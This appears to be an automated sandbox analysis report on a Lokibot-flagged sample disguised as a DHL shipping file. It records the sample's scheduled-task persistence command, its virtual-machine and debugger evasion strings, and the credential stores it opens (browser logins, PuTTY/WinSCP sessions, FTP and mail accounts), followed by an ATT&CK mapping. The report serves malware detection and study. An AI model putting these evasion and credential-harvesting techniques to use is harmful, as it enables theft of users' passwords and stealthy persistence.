              Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess information set: NOGPFAULTERRORBOX

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.233842339.0000000003379000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6604Thread sleep time: -41500s >= -30000s
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6620Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\DHL FILE 267382.exe TID: 6712Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: DHL FILE 267382.exe, 00000000.00000002.234228731.00000000035E8000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\wmiRSwSoPk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4DA9.tmp'
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeProcess created: C:\Users\user\Desktop\DHL FILE 267382.exe {path}
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Users\user\Desktop\DHL FILE 267382.exe VolumeInformation
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: 3_2_00406069 GetUserNameW,
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000000.00000002.234483040.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.243441085.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.233783014.0000000003321000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6600, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL FILE 267382.exe PID: 6708, type: MEMORY
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.DHL FILE 267382.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\DHL FILE 267382.exeCode function: SmtpPassword

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Access Token Manipulation1Masquerading1OS Credential Dumping2Security Software Discovery231Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsProcess Injection11Virtualization/Sandbox Evasion4Credentials in Registry2Virtualization/Sandbox Evasion4Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Disable or Modify Tools1Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 299736